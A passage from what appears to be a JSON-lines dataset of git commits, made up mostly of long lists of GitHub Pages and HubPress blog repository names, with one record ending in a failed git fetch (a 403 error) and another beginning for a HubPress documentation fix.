ptaksen.github.io,Nekothrace\/nekothrace.github.io,s-f-ek971\/s-f-ek971.github.io,chakbun\/chakbun.github.io,lxjk\/lxjk.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,RWOverdijk\/rwoverdijk.github.io,mozillahonduras\/mozillahonduras.github.io,lmcro\/hubpress.io,rpwolff\/rpwolff.github.io,thomasgwills\/thomasgwills.github.io,sfoubert\/sfoubert.github.io,wanjee\/wanjee.github.io,xavierdono\/xavierdono.github.io,Easter-Egg\/Easter-Egg.github.io,sumit1sen\/sumit1sen.github.io,namlongwp\/namlongwp.github.io,concigel\/concigel.github.io,tomas\/tomas.github.io,itsashis4u\/hubpress.io,2mosquitoes\/2mosquitoes.github.io,kunicmarko20\/kunicmarko20.github.io,kubevirt\/blog,mouseguests\/mouseguests.github.io,topicusonderwijs\/topicusonderwijs.github.io,namlongwp\/namlongwp.github.io,Cnlouds\/cnlouds.github.io,elenampva\/elenampva.github.io,roamarox\/roamarox.github.io,chaseey\/chaseey.github.io,sebasmonia\/sebasmonia.github.io,Easter-Egg\/Easter-Egg.github.io,maorodriguez\/maorodriguez.github.io,justafool5\/justafool5.github.io,ovo-6\/ovo-6.github.io,sebasmonia\/sebasmonia.github.io,gerdbremer\/gerdbremer.github.io,oppemism\/oppemism.github.io,eknuth\/eknuth.github.io,kzmenet\/kzmenet.github.io,Imran31\/imran31.github.io,wheeliz\/tech-blog,kwpale\/kwpale.github.io,xavierdono\/xavierdono.github.io,marchelo2212\/marchelo2212.github.io,mtx69\/mtx69.github.io,oldkoyot\/oldkoyot.github.io,ioisup\/ioisup.github.io,TinkeringAlways\/tinkeringalways.github.io,fasigpt\/fasigpt.github.io,hermione6\/hermione6.github.io,stevenxzhou\/alex1007.github.io,heberqc\/heberqc.github.io,crisgoncalves\/crisgoncalves.github.io,hhimanshu\/hhimanshu.github.io,alexandrev\/alexandrev.github.io,anwfr\/blog.anw.fr,StefanBertels\/stefanbertels.github.io,regdog\/regdog.github.io,saiisai\/saiisai.github.io,anggadja
va\/anggadjava.github.io,LearningTools\/LearningTools.github.io,pzmarzly\/g2zory,kfkelvinng\/kfkelvinng.github.io,chbailly\/chbailly.github.io,mnishihan\/mnishihan.github.io,HiDAl\/hidal.github.io,esbrannon\/esbrannon.github.io,gorjason\/gorjason.github.io,olivierbellone\/olivierbellone.github.io,Aerodactyl\/aerodactyl.github.io,geummo\/geummo.github.io,miplayer1\/miplayer1.github.io,reversergeek\/reversergeek.github.io,eknuth\/eknuth.github.io,timyklam\/timyklam.github.io,enderxyz\/enderxyz.github.io,ntfnd\/ntfnd.github.io,DominikVogel\/DominikVogel.github.io,willyb321\/willyb321.github.io,shinchiro\/shinchiro.github.io,birvajoshi\/birvajoshi.github.io,raditv\/raditv.github.io,saptaksen\/saptaksen.github.io,gquintana\/gquintana.github.io,zakkum42\/zakkum42.github.io,emtudo\/emtudo.github.io,swhgoon\/blog,ferandec\/ferandec.github.io,triskell\/triskell.github.io,alexbleasdale\/alexbleasdale.github.io,PertuyF\/PertuyF.github.io,apalkoff\/apalkoff.github.io,YJSoft\/yjsoft.github.io,grzrobak\/grzrobak.github.io,Lh4cKg\/Lh4cKg.github.io,foxsofter\/hubpress.io,thiderman\/daenney.github.io,mnishihan\/mnishihan.github.io,caglarsayin\/hubpress,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,SBozhko\/sbozhko.github.io,jelitox\/jelitox.github.io,angilent\/angilent.github.io,twentyTwo\/twentyTwo.github.io,susanburgess\/susanburgess.github.io,Kif11\/Kif11.github.io,SingularityMatrix\/SingularityMatrix.github.io,suedadam\/suedadam.github.io,IdoramNaed\/idoramnaed.github.io,deformat\/deformat.github.io,reversergeek\/reversergeek.github.io,Roen00\/roen00.github.io,euprogramador\/euprogramador.github.io,abien\/abien.github.io,endymion64\/endymion64.github.io,AgustinQuetto\/AgustinQuetto.github.io,pokev25\/pokev25.github.io,holtalanm\/holtalanm.github.io,live-smart\/live-smart.github.io,ahopkins\/amhopkins.com,velo\/velo.github.io,endymion64\/VinJBlog,Adyrhan\/adyrhan.github.io,iesextremadura\/iesextremadura.github.io,stay-india\/stay-india.github.io,ciekawy\/ciekawy.github.io,wols\/time,coder-ze\/coder-ze.github.io,dvmoomoodv\/hubpress.io,FRC125\/FRC125.github.io,wiibaa\/wiibaa.github.io,thezorgan\/thezorgan.github.io,PierreBtz\/pierrebtz.github.io,mmhchan\/mmhchan.github.io,raytong82\/raytong82.github.io,darsto\/darsto.github.io,iolabailey\/iolabailey.github.io,olivierbellone\/olivierbellone.github.io,jborichevskiy\/jborichevskiy.github.io,locnh\/locnh.github.io,pointout\/pointout.github.io,Vtek\/vtek.github.io,Le6ow5k1\/le6ow5k1.github.io,akr-optimus\/akr-optimus.github.io,FSUgenomics\/hubpress.io,egorlitvinenko\/egorlitvinenko.github.io,cringler\/cringler.github.io,pokev25\/pokev25.github.io,macchandev\/macchandev.github.io,sebbrousse\/sebbrousse.github.io,yysk\/yysk.github.io,YannDanthu\/YannDanthu.github.io,devkamboj\/devkamboj.github.io,heliomsolivas\/heliomsolivas.github.io,TelfordLab\/telfordlab.github.io,bitcowboy\/bitcowboy.github.io,geektic\/geektic.github.io,fadlee\/fadlee.github.io,TinkeringAlways\/tinkeringalways.github.io,gendalf9\/gendalf9.github.io---hubpress,itsashis4u\/hubpress.io,Murazaki\/murazaki.github.io,hitamutable\/hitamutable.github.io,crimarde\/crimarde.github.io,Andy4Craft\/andy4craft.github.io,mkorevec\/mkorevec.github.io,dbect\/dbect.github.io,jmelfi\/jmelfi.github.io,pysysops\/pysysops.github.io,in2erval\/in2erval.github.io,dakeshi\/dakeshi.github.io,florianhofmann\/florianhofmann.github.io,uskithub\/uskithub.github.io,hayyuelha\/technical-blog,Oziabr\/Oziabr.github.io,wheeliz\/tech-blog,gongxiancao\/gongxiancao.github.io,indusbox\/indusbox.github.io,expelled\/expelled.github
.io,zouftou\/zouftou.github.io,nicolasmaurice\/nicolasmaurice.github.io,blitzopteron\/ApesInc,Bulletninja\/bulletninja.github.io,cmosetick\/hubpress.io,the-101\/the-101.github.io,mdramos\/mdramos.github.io,alexgaspard\/alexgaspard.github.io,mkorevec\/mkorevec.github.io,ThomasLT\/thomaslt.github.io,arshakian\/arshakian.github.io,sgalles\/sgalles.github.io,deunz\/deunz.github.io,izziiyt\/izziiyt.github.io,Easter-Egg\/Easter-Egg.github.io,angilent\/angilent.github.io,twentyTwo\/twentyTwo.github.io,Rackcore\/Rackcore.github.io,blogforfun\/blogforfun.github.io,thefreequest\/thefreequest.github.io,itsallanillusion\/itsallanillusion.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,itsallanillusion\/itsallanillusion.github.io,prateekjadhwani\/prateekjadhwani.github.io,qu85101522\/qu85101522.github.io,kr-b\/kr-b.github.io,Oziabr\/Oziabr.github.io,crotel\/crotel.github.com,smirnoffs\/smirnoffs.github.io,deunz\/deunz.github.io,fr-developer\/fr-developer.github.io,tedroeloffzen\/tedroeloffzen.github.io,hoernschen\/hoernschen.github.io,mkorevec\/mkorevec.github.io,faldah\/faldah.github.io,iolabailey\/iolabailey.github.io,eduardo76609\/eduardo76609.github.io,kreids\/kreids.github.io,Easter-Egg\/Easter-Egg.github.io,fqure\/fqure.github.io,alvarosanchez\/alvarosanchez.github.io,manueljordan\/manueljordan.github.io,TsungmingLiu\/tsungmingliu.github.io,ovo-6\/ovo-6.github.io,gdfuentes\/gdfuentes.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,nilsonline\/nilsonline.github.io,qu85101522\/qu85101522.github.io,dvbnrg\/dvbnrg.github.io,mattbarton\/mattbarton.github.io,woehrl01\/woehrl01.hubpress.io,hirako2000\/hirako2000.github.io,anuragsingh31\/anuragsingh31.github.io,minditech\/minditech.github.io,faldah\/faldah.github.io,ronanki\/ronanki.github.io,nikogamulin\/nikogamulin.github.io,furcon\/furcon.github.io,JithinPavithran\/JithinPavithran.github.io,wheeliz\/tech-blog,introspectively\/introspectively.github.io,darkfirenze\/darkfirenze.github.io,FilipLaz\/filiplaz.github.io,timyklam\/timyklam.github.io,kai-cn\/kai-cn.github.io,flavienliger\/flavienliger.github.io,mnishihan\/mnishihan.github.io,jcsirot\/hubpress.io,chbailly\/chbailly.github.io,HubPress\/hubpress.io,bahamoth\/bahamoth.github.io,ComradeCookie\/comradecookie.github.io,gardenias\/sddb.com,pdudits\/pdudits.github.io,gongxiancao\/gongxiancao.github.io,jborichevskiy\/jborichevskiy.github.io,StefanBertels\/stefanbertels.github.io,jsonify\/jsonify.github.io,mdramos\/mdramos.github.io,deformat\/deformat.github.io,sitexa\/hubpress.io,itsashis4u\/hubpress.io,romanegunkov\/romanegunkov.github.io,ghostbind\/ghostbind.github.io,AlonsoCampos\/AlonsoCampos.github.io,anuragsingh31\/anuragsingh31.github.io,codechunks\/codechunks.github.io,MartinAhrer\/martinahrer.github.io,crazyrandom\/crazyrandom.github.io,Astalaseven\/astalaseven.github.io,ImpossibleBlog\/impossibleblog.github.io,RandomWebCrap\/randomwebcrap.github.io,realraindust\/realraindust.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,minicz\/minicz.github.io,henning-me\/henning-me.github.io,neuni\/neuni.github.io,tamakinkun\/tamakinkun.github.io,RaphaelSparK\/RaphaelSparK.github.io,ylliac\/ylliac.github.io,frenchduff\/frenchduff.github.io,Ardemius\/ardemius.github.io,MartinAhrer\/martinahrer.github.io,mahrocks\/mahrocks.github.io,alimasyhur\/alimasyhur.github.io,thykka\/thykka.github.io,IdoramNaed\/idoramnaed.github.io,al1enSuu\/al1enSuu.github.io,alick01\/alick01.github.io,GDGSriLanka\/blog,homenslibertemse\/homenslibertemse.github.io,srevereault\/srevereault.github.
io,mhmtbsbyndr\/mhmtbsbyndr.github.io,TsungmingLiu\/tsungmingliu.github.io,darsto\/darsto.github.io,KozytyPress\/kozytypress.github.io,fr-developer\/fr-developer.github.io,yuyudhan\/yuyudhan.github.io,silesnet\/silesnet.github.io,neocarvajal\/neocarvajal.github.io,mdinaustin\/mdinaustin.github.io,RandomWebCrap\/randomwebcrap.github.io,sfoubert\/sfoubert.github.io,siarlex\/siarlex.github.io,msravi\/msravi.github.io,hytgbn\/hytgbn.github.io,luzhox\/mejorandola.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,psicrest\/psicrest.github.io,maurodx\/maurodx.github.io,mazongo\/mazongo.github.io,geummo\/geummo.github.io,nickwanhere\/nickwanhere.github.io,pokev25\/pokev25.github.io,innovation-jp\/innovation-jp.github.io,patricekrakow\/patricekrakow.github.io,hyha600\/hyha600.github.io,scottellis64\/scottellis64.github.io,iwakuralai-n\/badgame-site,tkountis\/tkountis.github.io,heliomsolivas\/heliomsolivas.github.io,Asastry1\/inflect-blog,sandersky\/sandersky.github.io,Ardemius\/ardemius.github.io,skeate\/skeate.github.io,sidmusa\/sidmusa.github.io,CBSti\/CBSti.github.io,theofilis\/theofilis.github.io,harvard-visionlab\/harvard-visionlab.github.io,doochik\/doochik.github.io,yahussain\/yahussain.github.io,seatones\/seatones.github.io,dfjs\/dfjs.github.io,quentindemolliens\/quentindemolliens.github.io,suning-wireless\/Suning-Wireless.github.io,birvajoshi\/birvajoshi.github.io,lyqiangmny\/lyqiangmny.github.io,never-ask-never-know\/never-ask-never-know.github.io,velo\/velo.github.io,thomaszahr\/thomaszahr.github.io,cloudmind7\/cloudmind7.github.com,jsonify\/jsonify.github.io,drleidig\/drleidig.github.io,Motsai\/old-repo-to-mirror,nbourdin\/nbourdin.github.io,Nekothrace\/nekothrace.github.io,sgalles\/sgalles.github.io,fuhrerscene\/fuhrerscene.github.io,jmelfi\/jmelfi.github.io,Dhuck\/dhuck.github.io,swhgoon\/blog,mkhymohamed\/mkhymohamed.github.io,triskell\/triskell.github.io,sidemachine\/sidemachine.github.io,innovation-jp\/innovation-jp.github.io,nnn-dev\/nnn-dev.github.io,joescharf\/joescharf.github.io,al1enSuu\/al1enSuu.github.io,buliaoyin\/buliaoyin.github.io,htapia\/htapia.github.io,alchapone\/alchapone.github.io,Olika120\/Olika120.github.io,camilo28\/camilo28.github.io,TinkeringAlways\/tinkeringalways.github.io,skeate\/skeate.github.io,siarlex\/siarlex.github.io,HubPress\/hubpress.io,MichaelIT\/MichaelIT.github.io,azubkov\/azubkov.github.io,dakeshi\/dakeshi.github.io,bithunshal\/shalsblog,scottellis64\/scottellis64.github.io,the-101\/the-101.github.io,manikmagar\/manikmagar.github.io,wushaobo\/wushaobo.github.io,ciekawy\/ciekawy.github.io,kubevirt\/blog,evolgenomology\/evolgenomology.github.io,sidmusa\/sidmusa.github.io,mkaptein172\/mkaptein172.github.io,djengineerllc\/djengineerllc.github.io,gsera\/gsera.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,TunnyTraffic\/gh-hosting,blahcadepodcast\/blahcadepodcast.github.io,AppHat\/AppHat.github.io,cloudmind7\/cloudmind7.github.com,Roen00\/roen00.github.io,costalfy\/costalfy.github.io,Dekken\/dekken.github.io,mastersk3\/hubpress.io,simevidas\/simevidas.github.io,ahopkins\/amhopkins.com,Arttii\/arttii.github.io,IndianLibertarians\/indianlibertarians.github.io,lmcro\/hubpress.io,nicolasmaurice\/nicolasmaurice.github.io,ElteHupkes\/eltehupkes.github.io,jarcane\/jarcane.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,2wce\/2wce.github.io,mikealdo\/mikealdo.github.io,mrcouthy\/mrcouthy.github.io,nnn-dev\/nnn-dev.github.io,lxjk\/lxjk.github.io,Singulari
tyMatrix\/SingularityMatrix.github.io,jankolorenc\/jankolorenc.github.io,reversergeek\/reversergeek.github.io,livehua\/livehua.github.io,suning-wireless\/Suning-Wireless.github.io,ioisup\/ioisup.github.io,theblankpages\/theblankpages.github.io,TelfordLab\/telfordlab.github.io,fuzzy-logic\/fuzzy-logic.github.io,pzmarzly\/g2zory,AppHat\/AppHat.github.io,severin31\/severin31.github.io,gudhakesa\/gudhakesa.github.io,raghakot\/raghakot.github.io,Wurser\/wurser.github.io,kunicmarko20\/kunicmarko20.github.io,DominikVogel\/DominikVogel.github.io,ronanki\/ronanki.github.io,MattBlog\/mattblog.github.io,Adyrhan\/adyrhan.github.io,rohithkrajan\/rohithkrajan.github.io,HubPress\/hubpress.io,deivisk\/deivisk.github.io,TelfordLab\/telfordlab.github.io,thefreequest\/thefreequest.github.io,deruelle\/deruelle.github.io,dsp25no\/blog.dsp25no.ru,trapexit\/trapexit.github.io,ashelle\/ashelle.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,havvazaman\/havvazaman.github.io,xquery\/xquery.github.io,hirako2000\/hirako2000.github.io,lerzegov\/lerzegov.github.io,jtsiros\/jtsiros.github.io,wanjee\/wanjee.github.io,atfd\/hubpress.io,caglarsayin\/hubpress,Arttii\/arttii.github.io,johannewinwood\/johannewinwood.github.io,SingularityMatrix\/SingularityMatrix.github.io,cothan\/cothan.github.io,enderxyz\/enderxyz.github.io,jkschneider\/jkschneider.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,blackgun\/blackgun.github.io,datumrich\/datumrich.github.io,somosazucar\/centroslibres,netrunnerX\/netrunnerx.github.io,JithinPavithran\/JithinPavithran.github.io,pyxozjhi\/pyxozjhi.github.io,zubrx\/zubrx.github.io,pamasse\/pamasse.github.io,pallewela\/pallewela.github.io,itsashis4u\/hubpress.io,rizalp\/rizalp.github.io,rohithkrajan\/rohithkrajan.github.io,lovian\/lovian.github.io,raytong82\/raytong82.github.io,crotel\/crotel.github.com,caseyy\/caseyy.github.io,rlebron88\/rlebron88.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,anshu92\/blog,dfmooreqqq\/dfmooreqqq.github.io,jaganz\/jaganz.github.io,polarbill\/polarbill.github.io,devopSkill\/devopskill.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,iwangkai\/iwangkai.github.io,fuzzy-logic\/fuzzy-logic.github.io,henning-me\/henning-me.github.io,cdelmas\/cdelmas.github.io,kai-cn\/kai-cn.github.io,icthieves\/icthieves.github.io,therebelrobot\/blog-n.ode.rocks,ronanki\/ronanki.github.io,s-f-ek971\/s-f-ek971.github.io,chdask\/chdask.github.io,blackgun\/blackgun.github.io,dvbnrg\/dvbnrg.github.io,mmhchan\/mmhchan.github.io,Fendi-project\/fendi-project.github.io,dobin\/dobin.github.io,tedroeloffzen\/tedroeloffzen.github.io,caseyy\/caseyy.github.io,Tekl\/tekl.github.io,amodig\/amodig.github.io,dgrizzla\/dgrizzla.github.io,metasean\/blog,realraindust\/realraindust.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,ekroon\/ekroon.github.io,sandersky\/sandersky.github.io,mazongo\/mazongo.github.io,rushil-patel\/rushil-patel.github.io,johnkellden\/github.io,lovian\/lovian.github.io,jaredmorgs\/jaredmorgs.github.io,marchelo2212\/marchelo2212.github.io,carlomorelli\/carlomorelli.github.io,rizalp\/rizalp.github.io,sebasmonia\/sebasmonia.github.io,AlonsoCampos\/AlonsoCampos.github.io,akr-optimus\/akr-optimus.github.io,dobin\/dobin.github.io,carlomorelli\/carlomorelli.github.io,angilent\/angilent.github.io,al1enSuu\/al1enSuu.github.io,dvbnrg\/dvbnrg.github.io,Andy4Craft\/andy4craft.github.io,kosssi\/blog,thefreequest\/thefreequest.github.io,noahrc\/noahrc.github.io,Nil1\/Nil1.github.io,marioandres\/marioandres.github.io,royston\/hubpress.io,wusha
obo\/wushaobo.github.io,flug\/flug.github.io,StefanBertels\/stefanbertels.github.io,lerzegov\/lerzegov.github.io,alphaskade\/alphaskade.github.io,tedroeloffzen\/tedroeloffzen.github.io,Joemoe117\/Joemoe117.github.io,vanpelt\/vanpelt.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,mattburnin\/hubpress.io,sfoubert\/sfoubert.github.io,backemulus\/backemulus.github.io,hfluz\/hfluz.github.io,ciptard\/ciptard.github.io,vba\/vba.github.io,dakeshi\/dakeshi.github.io,bluenergy\/bluenergy.github.io,MatanRubin\/MatanRubin.github.io,tkountis\/tkountis.github.io,Vtek\/vtek.github.io,shutas\/shutas.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,xquery\/xquery.github.io,roamarox\/roamarox.github.io,drankush\/drankush.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,metasean\/hubpress.io,neurodiversitas\/neurodiversitas.github.io,laura-arreola\/laura-arreola.github.io,peter-lawrey\/peter-lawrey.github.io,jbutzprojects\/jbutzprojects.github.io,blahcadepodcast\/blahcadepodcast.github.io,alick01\/alick01.github.io,osada9000\/osada9000.github.io,lametaweb\/lametaweb.github.io,deruelle\/deruelle.github.io,alick01\/alick01.github.io,woehrl01\/woehrl01.hubpress.io,theblankpages\/theblankpages.github.io,Ugotsta\/Ugotsta.github.io,zubrx\/zubrx.github.io,mager19\/mager19.github.io,devkamboj\/devkamboj.github.io,markfetherolf\/markfetherolf.github.io,kzmenet\/kzmenet.github.io,mtx69\/mtx69.github.io,TsungmingLiu\/tsungmingliu.github.io,neurodiversitas\/neurodiversitas.github.io,anwfr\/blog.anw.fr,timyklam\/timyklam.github.io,ahopkins\/amhopkins.com,allancorra\/allancorra.github.io,glitched01\/glitched01.github.io,kzmenet\/kzmenet.github.io,zakkum42\/zakkum42.github.io,BulutKAYA\/bulutkaya.github.io,railsdev\/railsdev.github.io,Dekken\/dekken.github.io,tofusoul\/tofusoul.github.io,amuhle\/amuhle.github.io,kr-b\/kr-b.github.io,demohi\/blog,nullbase\/nullbase.github.io,alimasyhur\/alimasyhur.github.io,chbailly\/chbailly.github.io,sinemaga\/sinemaga.github.io,B3H1NDu\/b3h1ndu.github.io,rvegas\/rvegas.github.io,concigel\/concigel.github.io,dfmooreqqq\/dfmooreqqq.github.io,matthewbadeau\/matthewbadeau.github.io,mattburnin\/hubpress.io,KlimMalgin\/klimmalgin.github.io,vadio\/vadio.github.io,fuzzy-logic\/fuzzy-logic.github.io,ricardozanini\/ricardozanini.github.io,patricekrakow\/patricekrakow.github.io,CreditCardsCom\/creditcardscom.github.io,neuni\/neuni.github.io,parkowski\/parkowski.github.io,fgracia\/fgracia.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,IndianLibertarians\/indianlibertarians.github.io,justafool5\/justafool5.github.io,tkountis\/tkountis.github.io,inedit-reporter\/inedit-reporter.github.io,nnn-dev\/nnn-dev.github.io,xquery\/xquery.github.io,furcon\/furcon.github.io,ragingsmurf\/ragingsmurf.github.io,joelcbailey\/joelcbailey.github.io,bbsome\/bbsome.github.io,cringler\/cringler.github.io,quangpc\/quangpc.github.io,skeate\/skeate.github.io,xvin3t\/xvin3t.github.io,minicz\/minicz.github.io,DullestSaga\/dullestsaga.github.io,ThomasLT\/thomaslt.github.io,hayyuelha\/technical-blog,theofilis\/theofilis.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,willyb321\/willyb321.github.io,jgornati\/jgornati.github.io,txemis\/txemis.github.io,IdoramNaed\/idoramnaed.github.io,debbiezhu\/debbiezhu.github.io,qu85101522\/qu85101522.github.io,mubix\/blog.room362.com,alexandrev\/alexandrev.github.io,bluenergy\/bluenergy.github.io,yoanndupuy\/yoanndupuy.github.io,vs4vijay\/vs4vijay.github.io,Astalaseven\/astalaseven.github.io,chaseey\/chaseey.github.io,jsonify\/jsonify.github.io,hami-jp\/hami-jp.github.io,FRC125\/F
RC125.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,emtudo\/emtudo.github.io,wattsap\/wattsap.github.io,IndianLibertarians\/indianlibertarians.github.io,frenchduff\/frenchduff.github.io,bencekiraly\/bencekiraly.github.io,fqure\/fqure.github.io,3991\/3991.github.io,3991\/3991.github.io,Bulletninja\/bulletninja.github.io,sskorol\/sskorol.github.io,jrhea\/jrhea.github.io,stevenxzhou\/alex1007.github.io,chaseconey\/chaseconey.github.io,scholzi94\/scholzi94.github.io,puzzles-engineer\/puzzles-engineer.github.io,3991\/3991.github.io,tomas\/tomas.github.io,Brzhk\/Brzhk.github.io,vendanoapp\/vendanoapp.github.io,ImpossibleBlog\/impossibleblog.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,alick01\/alick01.github.io,chrizco\/chrizco.github.io,mattpearson\/mattpearson.github.io,Cnlouds\/cnlouds.github.io,laposheureux\/laposheureux.github.io,codingkapoor\/codingkapoor.github.io,topranks\/topranks.github.io,studiocardo\/studiocardo.github.io,fasigpt\/fasigpt.github.io,SuperMMX\/supermmx.github.io,endymion64\/endymion64.github.io,nectia-think\/nectia-think.github.io,KozytyPress\/kozytypress.github.io,rage5474\/rage5474.github.io,icthieves\/icthieves.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,locnh\/locnh.github.io,Kif11\/Kif11.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,visionui\/visionui.github.io,jbrizio\/jbrizio.github.io,al1enSuu\/al1enSuu.github.io,AlonsoCampos\/AlonsoCampos.github.io,neuni\/neuni.github.io,minicz\/minicz.github.io,backemulus\/backemulus.github.io,xurei\/xurei.github.io,fgracia\/fgracia.github.io,zestyroxy\/zestyroxy.github.io,parkowski\/parkowski.github.io,regdog\/regdog.github.io,2wce\/2wce.github.io,jarbro\/jarbro.github.io,never-ask-never-know\/never-ask-never-know.github.io,jrhea\/jrhea.github.io,wayr\/wayr.github.io,htapia\/htapia.github.io,Aerodactyl\/aerodactyl.github.io,fundstuecke\/fundstuecke.github.io,gorjason\/gorjason.github.io,jborichevskiy\/jborichevskiy.github.io,introspectively\/introspectively.github.io,fqure\/fqure.github.io,yuyudhan\/yuyudhan.github.io,uskithub\/uskithub.github.io,bitcowboy\/bitcowboy.github.io,RWOverdijk\/rwoverdijk.github.io,esbrannon\/esbrannon.github.io,bitcowboy\/bitcowboy.github.io,dsp25no\/blog.dsp25no.ru,rage5474\/rage5474.github.io,izziiyt\/izziiyt.github.io,lametaweb\/lametaweb.github.io,iesextremadura\/iesextremadura.github.io,euprogramador\/euprogramador.github.io,sumit1sen\/sumit1sen.github.io,dannylane\/dannylane.github.io,plaidshirtguy\/plaidshirtguy.github.io,KurtStam\/kurtstam.github.io,zakkum42\/zakkum42.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,bithunshal\/shalsblog,yysk\/yysk.github.io,bretonio\/bretonio.github.io,GWCATT\/gwcatt.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,xurei\/xurei.github.io,hapee\/hapee.github.io,timelf123\/timelf123.github.io,jkamke\/jkamke.github.io,lifengchuan2008\/lifengchuan2008.github.io,wiibaa\/wiibaa.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,jaslyn94\/jaslyn94.github.io,rushil-patel\/rushil-patel.github.io,randhson\/Blog,abien\/abien.github.io,debbiezhu\/debbiezhu.github.io,Rackcore\/Rackcore.github.io,minicz\/minicz.github.io,ylliac\/ylliac.github.io,visionui\/visionui.github.io,soyabeen\/soyabeen.github.io,flug\/flug.github.io,jankolorenc\/jankolorenc.github.io,ennerf\/ennerf.github.io,mattpearson\/mattpearson.github.io,cncgl\/cncgl.github.io,devananda\/devananda.github.io,wols\/time,alexgaspard\/alexgaspard.github.io,unay-ci
lamega\/unay-cilamega.github.io,raditv\/raditv.github.io,HiDAl\/hidal.github.io,evolgenomology\/evolgenomology.github.io,ecmeyva\/ecmeyva.github.io,birvajoshi\/birvajoshi.github.io,jrhea\/jrhea.github.io,ecmeyva\/ecmeyva.github.io,Ellixo\/ellixo.github.io,xvin3t\/xvin3t.github.io,prateekjadhwani\/prateekjadhwani.github.io,spikebachman\/spikebachman.github.io,roobyz\/roobyz.github.io,LearningTools\/LearningTools.github.io,umarana\/umarana.github.io,Le6ow5k1\/le6ow5k1.github.io,triskell\/triskell.github.io,iwakuralai-n\/badgame-site,kosssi\/blog,romanegunkov\/romanegunkov.github.io,duarte-fonseca\/duarte-fonseca.github.io,yahussain\/yahussain.github.io,darsto\/darsto.github.io,gardenias\/sddb.com,NativeScriptBrasil\/nativescriptbrasil.github.io,yeddiyarim\/yeddiyarim.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,fbiville\/fbiville.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,gudhakesa\/gudhakesa.github.io,jonathandmoore\/jonathandmoore.github.io,crisgoncalves\/crisgoncalves.github.io,pysaumont\/pysaumont.github.io,bahamoth\/bahamoth.github.io,fqure\/fqure.github.io,thomasgwills\/thomasgwills.github.io,SRTjiawei\/SRTjiawei.github.io,djmdata\/djmdata.github.io,royston\/hubpress.io,psicrest\/psicrest.github.io,mattburnin\/hubpress.io,jbrizio\/jbrizio.github.io,crotel\/crotel.github.com,macchandev\/macchandev.github.io,hutchr\/hutchr.github.io,joelcbailey\/joelcbailey.github.io,havvazaman\/havvazaman.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,dbect\/dbect.github.io,topicusonderwijs\/topicusonderwijs.github.io,susanburgess\/susanburgess.github.io,sonyl\/sonyl.github.io,rishipatel\/rishipatel.github.io,nicolasmaurice\/nicolasmaurice.github.io,pointout\/pointout.github.io,iolabailey\/iolabailey.github.io,MattBlog\/mattblog.github.io,YannDanthu\/YannDanthu.github.io,popurax\/popurax.github.io,deruelle\/deruelle.github.io,theofilis\/theofilis.github.io,popurax\/popurax.github.io,devopSkill\/devopskill.github.io,javathought\/javathought.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,pysysops\/pysysops.github.io,acien101\/acien101.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3d129a1deb158437ba3803e6845e879f1512dfa","subject":"fix(documentation): Update screenshot edit-config for gh-pages fix #7","message":"fix(documentation): Update screenshot edit-config for gh-pages fix 
#7\n\nConflicts:\n\tREADME.adoc\n","repos":"shinnoki\/hubpress.io,natsu90\/hubpress.io,matthardwick\/hubpress.io,jabbytechnologies\/blog,amberry\/blog,jlmcgehee21\/nooganeer,Bloggerschmidt\/bloggerschmidt.de,devananda\/devananda.github.io,sidorares\/sidorares.github.io,isaacriquelme\/endata.do,Port666\/hubpress.io,trycrmr\/hubpress.io,tedbergeron\/hubpress.io,hutchr\/hutchr.github.io,jmini\/hubpress.io,jabbytechnologies\/blog,jamarortiz\/pragmaticalware,hang-h\/hubpress.io,henryouly\/henryouly.github.io,201507\/blog,roelvs\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,ice09\/ice09ng,whelamc\/life,baocongchen\/blogs,melix\/hubpress,envyen\/blog,thesagarsutar\/hubpress,fastretailing\/blog,J0HDev\/blog,Astrokoala-Studio\/hubpress.io,trycrmr\/hubpress.io,jsiu22\/blog,ashalkhakov\/hubpress.io,rubyinhell\/hubpress.io,rrrhys\/blog.codeworkshop.com.au,Adyrhan\/adyrhan.github.io,mcornell\/OFM,yhikishima\/hubpress,ruaqiwei23\/blog,MinxianLi\/hubpress.io,Lukas238\/the-holodeck,redrabbit-calligraphy\/redrabbit-calligraphy-blog,csiebler\/hubpress-test,OlympusOnline2\/announcements,mairandomness\/randomblog,benignbala\/benignbala.hubpress.io,rh0\/the-myriad-path,codelab-lbernard\/blog,aspick\/hubpress.io,Jason2013\/hubpress,mimiz\/mimiz.github.io,meli